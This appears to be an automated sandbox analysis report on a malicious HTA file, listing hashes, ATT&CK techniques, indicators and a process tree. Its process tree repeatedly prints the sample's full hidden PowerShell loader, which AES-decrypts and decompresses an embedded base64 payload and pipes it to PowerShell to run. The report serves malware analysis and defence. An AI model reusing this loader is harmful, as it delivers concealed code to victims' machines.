bad430b568dbe3b7d6fac03fe953377d2b99e0632bf55cd5c318597d315c5074

General

Target

bad430b568dbe3b7d6fac03fe953377d2b99e0632bf55cd5c318597d315c5074.hta
Size

1.3MB
MD5

715d2502c51eddfd399a63042a259634
SHA1

3b3fe625bb815ffb20d928b3d31a75fce981ce95
SHA256

bad430b568dbe3b7d6fac03fe953377d2b99e0632bf55cd5c318597d315c5074
SHA512

6b821f233a64b8c0cb7ca7ad53d51558c412db4c9acaff384f48a649a00a61967b79b1ea414acd4ca58040e24405fae7dde1c1e646395d8358dcff91dae7779b
SSDEEP

3072:8m8dVB780qXTtxi7FN8YnpFwrJZxsAXkO3kQ3iF/+:H8db780qX5EjRpKrDxbrUQ3y+

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2380	powershell.exe
2380	powershell.exe
2380	powershell.exe
2620	powershell.exe
2564	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 2380	1448	mshta.exe	29
PID 1448 wrote to memory of 2380	1448	mshta.exe	29
PID 1448 wrote to memory of 2380	1448	mshta.exe	29
PID 1448 wrote to memory of 2380	1448	mshta.exe	29
PID 2380 wrote to memory of 2728	2380	powershell.exe	31
PID 2380 wrote to memory of 2728	2380	powershell.exe	31
PID 2380 wrote to memory of 2728	2380	powershell.exe	31
PID 2380 wrote to memory of 2728	2380	powershell.exe	31
PID 2728 wrote to memory of 2620	2728	cmd.exe	32
PID 2728 wrote to memory of 2620	2728	cmd.exe	32
PID 2728 wrote to memory of 2620	2728	cmd.exe	32
PID 2728 wrote to memory of 2620	2728	cmd.exe	32
PID 2728 wrote to memory of 2564	2728	cmd.exe	33
PID 2728 wrote to memory of 2564	2728	cmd.exe	33
PID 2728 wrote to memory of 2564	2728	cmd.exe	33
PID 2728 wrote to memory of 2564	2728	cmd.exe	33

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bad430b568dbe3b7d6fac03fe953377d2b99e0632bf55cd5c318597d315c5074.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $Dzxb = 'AAAAAAAAAAAAAAAAAAAAAOSJcRBovNv75MtNPRQryhlrwkaJ2ZpI99R6oR34ORB2TAiMUg4BqXsVqByn3HO9MwRrSUJSLIBGPPPX+l6VPwG4yZGppZHYPpD9jGI+2MOOiwffjn499AN2tuTzuIhAfWMxeNlMCELD6AApua7QkMmp2WntOIzXYTqyZp8s2WqIT8HspdMR7faIakYdXXp8FjCfqYo6pAE+WLozFsquCaIChb236ce6g90KLzn59u7MIe1npggCldzUfPs6SpXCvKIBUZmxtVac0NkrYFG4SVFgDOvzdMbHGYrkK0x/3jiXYEJmXLHlCFV+6cEJX7I2CmIjy5bWEsnxfmeFnXzuzSsWMosU4PD+bMGDRnardA8F++LpiawRe7lCAhHGehCESZOEPa4iEH0PWFujrtq5p6U6IqG3xMCAW2uI4FKmTp3TzgeAf8rloSbi3vOI8vHBF58dgOolCImHtz4W3MjLXhZcvk+freodJi7ItH1k7pgjWgadQ/2F822xR+TCQyrTCItfM+xKVV7pzwsFSQf8prX60+3RtjXQLDdgdz0vrZVfW2ZmS2F/7A007bMWQgZDJEU1YPIwYOv7fueeOei3Q+dPcMXcPaqSBFnOv9ULZ3dJNi2P1Yd1m3X8oQjp/b3gLdIcmfbWDTYTa6VIQxXe+2v0l2lUMjhXG7EN7lrYFi3mBKLpeUq+2gDm7vIiXqHdtitV0nw3OnzK6YGGIrTTS7HJE3NgqU9vX/H2QtuHsfFk4mH5xIO+Xh7mCUaBEDxbjlyci2XdmQEgKk3BhoSM6rzxuLBEMTitUeRA4fqg4fDFfgy4Jm9mKBADwKYFjWH7p9LX2Mb2ASHE1y8Qt53a70Hha+ia6fnVMmecQHLh9boPs1AFTjCCrCv1wxYtLRNorscF/TXjcSG/dgCijU08u8FxexUlCEHL1AdxUCmmISYvZNbXf/xiTE9HDWoZIZJQ0dqG0x/XGIymHh9h8rSToxd4gtaA6S/JaTfXc8acV0LtkZgilSXsach8Ux+zzOmw/P78B0qJUnFYPr2q6siRgJ9uVyOrtj+Aatv51wTGF+tN0dTenFh2bdLxUaS72kZPrs5JNM1jhh8Udr+WxPHCzB8Rpb7Hf3yb9N/54JtzuIbzlKQWaK2qLA5G47tGc+yO1iJ6wZHx8EivwQsyUrD6F1M=';$sUcUPxU = 'dVdqd2RRTnlFbW1vdFNidFR3eEViQXJqQ0l3a2JWQ3M=';$GDJXGNY = New-Object 'System.Security.Cryptography.AesManaged';$GDJXGNY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$GDJXGNY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$GDJXGNY.BlockSize = 128;$GDJXGNY.KeySize = 256;$GDJXGNY.Key = [System.Convert]::FromBase64String($sUcUPxU);$KPwOZ = [System.Convert]::FromBase64String($Dzxb);$LdCzhhCP = $KPwOZ[0..15];$GDJXGNY.IV = $LdCzhhCP;$wqkPqQHMD = $GDJXGNY.CreateDecryptor();$EcXHdQkBU = $wqkPqQHMD.TransformFinalBlock($KPwOZ, 16, $KPwOZ.Length - 16);$GDJXGNY.Dispose();$lXDSPY = New-Object System.IO.MemoryStream( , $EcXHdQkBU );$dYmjzG = New-Object System.IO.MemoryStream;$PcRmtDxrk = New-Object System.IO.Compression.GzipStream $lXDSPY, ([IO.Compression.CompressionMode]::Decompress);$PcRmtDxrk.CopyTo( $dYmjzG );$PcRmtDxrk.Close();$lXDSPY.Close();[byte[]] $EyqGSe = $dYmjzG.ToArray();$pQiMRyM = [System.Text.Encoding]::UTF8.GetString($EyqGSe);$pQiMRyM | powershell - }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $Dzxb = 'AAAAAAAAAAAAAAAAAAAAAOSJcRBovNv75MtNPRQryhlrwkaJ2ZpI99R6oR34ORB2TAiMUg4BqXsVqByn3HO9MwRrSUJSLIBGPPPX+l6VPwG4yZGppZHYPpD9jGI+2MOOiwffjn499AN2tuTzuIhAfWMxeNlMCELD6AApua7QkMmp2WntOIzXYTqyZp8s2WqIT8HspdMR7faIakYdXXp8FjCfqYo6pAE+WLozFsquCaIChb236ce6g90KLzn59u7MIe1npggCldzUfPs6SpXCvKIBUZmxtVac0NkrYFG4SVFgDOvzdMbHGYrkK0x/3jiXYEJmXLHlCFV+6cEJX7I2CmIjy5bWEsnxfmeFnXzuzSsWMosU4PD+bMGDRnardA8F++LpiawRe7lCAhHGehCESZOEPa4iEH0PWFujrtq5p6U6IqG3xMCAW2uI4FKmTp3TzgeAf8rloSbi3vOI8vHBF58dgOolCImHtz4W3MjLXhZcvk+freodJi7ItH1k7pgjWgadQ/2F822xR+TCQyrTCItfM+xKVV7pzwsFSQf8prX60+3RtjXQLDdgdz0vrZVfW2ZmS2F/7A007bMWQgZDJEU1YPIwYOv7fueeOei3Q+dPcMXcPaqSBFnOv9ULZ3dJNi2P1Yd1m3X8oQjp/b3gLdIcmfbWDTYTa6VIQxXe+2v0l2lUMjhXG7EN7lrYFi3mBKLpeUq+2gDm7vIiXqHdtitV0nw3OnzK6YGGIrTTS7HJE3NgqU9vX/H2QtuHsfFk4mH5xIO+Xh7mCUaBEDxbjlyci2XdmQEgKk3BhoSM6rzxuLBEMTitUeRA4fqg4fDFfgy4Jm9mKBADwKYFjWH7p9LX2Mb2ASHE1y8Qt53a70Hha+ia6fnVMmecQHLh9boPs1AFTjCCrCv1wxYtLRNorscF/TXjcSG/dgCijU08u8FxexUlCEHL1AdxUCmmISYvZNbXf/xiTE9HDWoZIZJQ0dqG0x/XGIymHh9h8rSToxd4gtaA6S/JaTfXc8acV0LtkZgilSXsach8Ux+zzOmw/P78B0qJUnFYPr2q6siRgJ9uVyOrtj+Aatv51wTGF+tN0dTenFh2bdLxUaS72kZPrs5JNM1jhh8Udr+WxPHCzB8Rpb7Hf3yb9N/54JtzuIbzlKQWaK2qLA5G47tGc+yO1iJ6wZHx8EivwQsyUrD6F1M=';$sUcUPxU = 'dVdqd2RRTnlFbW1vdFNidFR3eEViQXJqQ0l3a2JWQ3M=';$GDJXGNY = New-Object 'System.Security.Cryptography.AesManaged';$GDJXGNY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$GDJXGNY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$GDJXGNY.BlockSize = 128;$GDJXGNY.KeySize = 256;$GDJXGNY.Key = [System.Convert]::FromBase64String($sUcUPxU);$KPwOZ = [System.Convert]::FromBase64String($Dzxb);$LdCzhhCP = $KPwOZ[0..15];$GDJXGNY.IV = $LdCzhhCP;$wqkPqQHMD = $GDJXGNY.CreateDecryptor();$EcXHdQkBU = $wqkPqQHMD.TransformFinalBlock($KPwOZ, 16, $KPwOZ.Length - 16);$GDJXGNY.Dispose();$lXDSPY = New-Object System.IO.MemoryStream( , $EcXHdQkBU );$dYmjzG = New-Object System.IO.MemoryStream;$PcRmtDxrk = New-Object System.IO.Compression.GzipStream $lXDSPY, ([IO.Compression.CompressionMode]::Decompress);$PcRmtDxrk.CopyTo( $dYmjzG );$PcRmtDxrk.Close();$lXDSPY.Close();[byte[]] $EyqGSe = $dYmjzG.ToArray();$pQiMRyM = [System.Text.Encoding]::UTF8.GetString($EyqGSe);$pQiMRyM | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe $Dzxb = 'AAAAAAAAAAAAAAAAAAAAAOSJcRBovNv75MtNPRQryhlrwkaJ2ZpI99R6oR34ORB2TAiMUg4BqXsVqByn3HO9MwRrSUJSLIBGPPPX+l6VPwG4yZGppZHYPpD9jGI+2MOOiwffjn499AN2tuTzuIhAfWMxeNlMCELD6AApua7QkMmp2WntOIzXYTqyZp8s2WqIT8HspdMR7faIakYdXXp8FjCfqYo6pAE+WLozFsquCaIChb236ce6g90KLzn59u7MIe1npggCldzUfPs6SpXCvKIBUZmxtVac0NkrYFG4SVFgDOvzdMbHGYrkK0x/3jiXYEJmXLHlCFV+6cEJX7I2CmIjy5bWEsnxfmeFnXzuzSsWMosU4PD+bMGDRnardA8F++LpiawRe7lCAhHGehCESZOEPa4iEH0PWFujrtq5p6U6IqG3xMCAW2uI4FKmTp3TzgeAf8rloSbi3vOI8vHBF58dgOolCImHtz4W3MjLXhZcvk+freodJi7ItH1k7pgjWgadQ/2F822xR+TCQyrTCItfM+xKVV7pzwsFSQf8prX60+3RtjXQLDdgdz0vrZVfW2ZmS2F/7A007bMWQgZDJEU1YPIwYOv7fueeOei3Q+dPcMXcPaqSBFnOv9ULZ3dJNi2P1Yd1m3X8oQjp/b3gLdIcmfbWDTYTa6VIQxXe+2v0l2lUMjhXG7EN7lrYFi3mBKLpeUq+2gDm7vIiXqHdtitV0nw3OnzK6YGGIrTTS7HJE3NgqU9vX/H2QtuHsfFk4mH5xIO+Xh7mCUaBEDxbjlyci2XdmQEgKk3BhoSM6rzxuLBEMTitUeRA4fqg4fDFfgy4Jm9mKBADwKYFjWH7p9LX2Mb2ASHE1y8Qt53a70Hha+ia6fnVMmecQHLh9boPs1AFTjCCrCv1wxYtLRNorscF/TXjcSG/dgCijU08u8FxexUlCEHL1AdxUCmmISYvZNbXf/xiTE9HDWoZIZJQ0dqG0x/XGIymHh9h8rSToxd4gtaA6S/JaTfXc8acV0LtkZgilSXsach8Ux+zzOmw/P78B0qJUnFYPr2q6siRgJ9uVyOrtj+Aatv51wTGF+tN0dTenFh2bdLxUaS72kZPrs5JNM1jhh8Udr+WxPHCzB8Rpb7Hf3yb9N/54JtzuIbzlKQWaK2qLA5G47tGc+yO1iJ6wZHx8EivwQsyUrD6F1M=';$sUcUPxU = 'dVdqd2RRTnlFbW1vdFNidFR3eEViQXJqQ0l3a2JWQ3M=';$GDJXGNY = New-Object 'System.Security.Cryptography.AesManaged';$GDJXGNY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$GDJXGNY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$GDJXGNY.BlockSize = 128;$GDJXGNY.KeySize = 256;$GDJXGNY.Key = [System.Convert]::FromBase64String($sUcUPxU);$KPwOZ = [System.Convert]::FromBase64String($Dzxb);$LdCzhhCP = $KPwOZ[0..15];$GDJXGNY.IV = $LdCzhhCP;$wqkPqQHMD = $GDJXGNY.CreateDecryptor();$EcXHdQkBU = $wqkPqQHMD.TransformFinalBlock($KPwOZ, 16, $KPwOZ.Length - 16);$GDJXGNY.Dispose();$lXDSPY = New-Object System.IO.MemoryStream( , $EcXHdQkBU );$dYmjzG = New-Object System.IO.MemoryStream;$PcRmtDxrk = New-Object System.IO.Compression.GzipStream $lXDSPY, ([IO.Compression.CompressionMode]::Decompress);$PcRmtDxrk.CopyTo( $dYmjzG );$PcRmtDxrk.Close();$lXDSPY.Close();[byte[]] $EyqGSe = $dYmjzG.ToArray();$pQiMRyM = [System.Text.Encoding]::UTF8.GetString($EyqGSe);$pQiMRyM
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2620
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
facb2d44600cd55eaa65d9c51a3c298a

SHA1
e97db3944c82239b939868016dbd4960ee3a53b5

SHA256
d500378d3dc284492111322992469d5e73ebb1a1b71ecba76cffd6bc4563234a

SHA512
7c1432df7811df22558eb1a12fce4f2403513bb26cc2fc29f2719a80a61c436b3073373b621c31e3a9f8737d911641424a5e80d1581b12662944cf61d6b3fd38

Download Submit
memory/2380-3-0x00000000721D0000-0x000000007277B000-memory.dmp

Filesize
5.7MB

Download
memory/2380-6-0x0000000002C60000-0x0000000002CA0000-memory.dmp

Filesize
256KB

Download
memory/2380-9-0x00000000721D0000-0x000000007277B000-memory.dmp

Filesize
5.7MB

Download
memory/2380-18-0x00000000721D0000-0x000000007277B000-memory.dmp

Filesize
5.7MB

Download
memory/2564-34-0x0000000072C90000-0x000000007323B000-memory.dmp

Filesize
5.7MB

Download
memory/2564-36-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2564-35-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2564-33-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2564-38-0x0000000072C90000-0x000000007323B000-memory.dmp

Filesize
5.7MB

Download
memory/2620-31-0x0000000072C90000-0x000000007323B000-memory.dmp

Filesize
5.7MB

Download
memory/2620-32-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/2620-29-0x0000000072C90000-0x000000007323B000-memory.dmp

Filesize
5.7MB

Download
memory/2620-30-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/2620-37-0x0000000072C90000-0x000000007323B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing